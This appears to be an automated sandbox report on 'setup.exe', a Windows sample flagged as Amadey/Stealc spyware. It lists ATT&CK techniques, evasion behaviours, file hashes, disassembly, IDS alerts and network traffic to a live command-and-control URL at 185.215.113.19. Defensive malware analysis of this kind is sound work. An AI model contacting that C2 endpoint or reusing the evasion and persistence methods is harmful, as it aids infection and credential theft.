                    Source: Yara matchFile source: 3.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.setup.exe.c20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483216 Sample: setup.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 24 Found malware configuration 2->24 26 Antivirus detection for URL or domain 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 6 other signatures 2->30 6 setup.exe 5 2->6         started        10 explorti.exe 2->10         started        12 explorti.exe 12 2->12         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->18 dropped 20 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 explorti.exe 6->15         started        38 Antivirus detection for dropped file 10->38 40 Multi AV Scanner detection for dropped file 10->40 42 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->42 44 Machine Learning detection for dropped file 10->44 22 185.215.113.19, 56720, 56721, 56722 WHOLESALECONNECTIONSNL Portugal 12->22 46 Hides threads from debuggers 12->46 48 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->48 50 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->50 file5 signatures6 process7 signatures8 52 Hides threads from debuggers 15->52 54 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->54 56 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->56

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    setup.exe62%ReversingLabsWin32.Spyware.Stealc
                    setup.exe100%AviraTR/Crypt.TPM.Gen
                    setup.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe62%ReversingLabsWin32.Spyware.Stealc
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.19/Vi9leo/index.php100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpt100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpN100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php8100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpC100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpa100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpr100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpo100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpm32100%Avira URL Cloudphishing
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phptrue
                    • Avira URL Cloud: phishing
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phpoexplorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phprexplorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpaexplorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phptexplorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpCexplorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.php8explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpm32explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpNexplorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.19
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483216
                    Start date and time:2024-07-26 21:02:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:setup.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 3384 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 4540 because there are no executed function
                    • Execution Graph export aborted for target setup.exe, PID 4788 because it is empty
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: setup.exe
                    TimeTypeDescription
                    15:04:02API Interceptor296260x Sleep call for process: explorti.exe modified
                    21:03:05Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.19setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    LbMTyCFRzs.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    DHBIT8FeuO.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLsetup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                    • 185.215.113.16
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.9
                    file.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.9
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16
                    No context
                    No context
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1971200
                    Entropy (8bit):7.946985346283621
                    Encrypted:false
                    SSDEEP:24576:EbwZGWBF4JrhKAlbJm35/vewlxk52vrTmMbT1KALVQtGKDLltj7kXCUiE8lmEE3P:EGANKAlb0lv9YT8UGSL38XCD4EeAyr
                    MD5:F6DCA815EB37C8AA9BA54C603624227B
                    SHA1:4A2215C9B3D8125D176014D528BE0563AEF1979E
                    SHA-256:E294F1B0EC3CFF802AAA8BE3FC47AA0C1A56CBDC644467503E5B30122954964D
                    SHA-512:6DF5F2608B88170C32258150689123DE759694976BBFB063CD03CA646452BFD5BA97D3282DB83E9F138F3885627DF5437D2455765C3D93A28E860EC2972529CA
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 62%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f.............................`M...........@...........................M.....+.....@.................................W...k............................IM..............................IM..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...rylhmesc.....P2.....................@...ofvhckac.....PM.....................@....taggant.0...`M.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):306
                    Entropy (8bit):3.4023095668768453
                    Encrypted:false
                    SSDEEP:6:JC/DZXaXUEZ+lX1cI1l6lm6tE9+AQy0l1Xkt0:JelaQ1cagQ9+nV1Ut0
                    MD5:21BCCFF900B06609DDBD32FABEBC025E
                    SHA1:385C611C5DD3BC51DD055D1B5D5DE776AC85D25C
                    SHA-256:6A5AA44CB490E7F6FF0F75C8F2E87DDD85E4208879E4A147F4B9669181572ECB
                    SHA-512:B033F8D1FA592B0C3ECA539D63FE392E0346D64292463F2DB399E2E2A0EF7137D472E1939A3A40AAFCCDDEBC821F9CEC7439797E25708DC0C2BCD7F6CE459993
                    Malicious:false
                    Reputation:low
                    Preview:......]..F.B.,.[..i.F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.946985346283621
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:setup.exe
                    File size:1'971'200 bytes
                    MD5:f6dca815eb37c8aa9ba54c603624227b
                    SHA1:4a2215c9b3d8125d176014d528be0563aef1979e
                    SHA256:e294f1b0ec3cff802aaa8be3fc47aa0c1a56cbdc644467503e5b30122954964d
                    SHA512:6df5f2608b88170c32258150689123de759694976bbfb063cd03ca646452bfd5ba97d3282db83e9f138f3885627df5437d2455765c3d93a28e860ec2972529ca
                    SSDEEP:24576:EbwZGWBF4JrhKAlbJm35/vewlxk52vrTmMbT1KALVQtGKDLltj7kXCUiE8lmEE3P:EGANKAlb0lv9YT8UGSL38XCD4EeAyr
                    TLSH:3D953336BFF3A784DA78D579DBA783A242343F8254D0E9B9220CED57269368C11F146C
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x8d6000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007FF32CE1433Ah
                    pslld mm3, qword ptr [00000000h]
                    add cl, ch
                    add byte ptr [eax], ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [0700000Ah], al
                    or al, byte ptr [eax]
                    add byte ptr [ebx], cl
                    or al, byte ptr [eax]
                    add byte ptr [ecx], al
                    or al, byte ptr [eax]
                    add byte ptr [ebx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax*4], cl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    pop es
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ebx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4d49f40x10rylhmesc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4d49a40x18rylhmesc
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2dc0054258ab361f8bc636aa242941ca6d058False0.9998719262295082data7.983148121720557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200062cf784405798c6c6c6b27af54a642bFalse0.578125data4.525251618976754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2ba0000x200fb8c683a4538b15532602ca8955196a6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    rylhmesc0x3250000x1b00000x1afc0048b65f631ae3c659ad22ec792367a9e0False0.9945997846699479data7.952696111098041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ofvhckac0x4d50000x10000x400056e1d2bc10a84cb19f29948d0545599False0.779296875data6.1648949197117355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4d60000x30000x220037edd11d96dc034770b58ae0b27a4680False0.06215533088235294DOS executable (COM)0.7280935907816917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4d4a040x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-26T21:03:46.242634+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435671840.127.169.103192.168.2.6
                    2024-07-26T21:04:04.757321+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35672080192.168.2.6185.215.113.19
                    2024-07-26T21:04:09.346760+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35672480192.168.2.6185.215.113.19
                    2024-07-26T21:03:19.182564+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971340.127.169.103192.168.2.6
                    2024-07-26T21:04:11.658713+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35672680192.168.2.6185.215.113.19
                    2024-07-26T21:04:10.475380+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35672580192.168.2.6185.215.113.19
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 21:04:03.892682076 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:03.898041964 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:03.898139954 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:03.898607969 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:03.904963970 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:04.757033110 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:04.757320881 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:04.759771109 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:04.773948908 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.033510923 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.033571005 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.148601055 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.148904085 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.156003952 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.156099081 CEST8056720185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.156151056 CEST5672080192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.156312943 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.156424999 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.163397074 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.945589066 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:05.945712090 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.946383953 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:05.951636076 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:06.197446108 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:06.197519064 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.305057049 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.305370092 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.311151981 CEST8056722185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:06.311381102 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.311816931 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.312510967 CEST8056721185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:06.312650919 CEST5672180192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:06.319253922 CEST8056722185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:07.071187973 CEST8056722185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:07.071270943 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:07.072134972 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:07.077075005 CEST8056722185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:07.320554018 CEST8056722185.215.113.19192.168.2.6
                    Jul 26, 2024 21:04:07.320652962 CEST5672280192.168.2.6185.215.113.19
                    Jul 26, 2024 21:04:07.429774046 CEST5672280192.168.2.6185.215.113.19
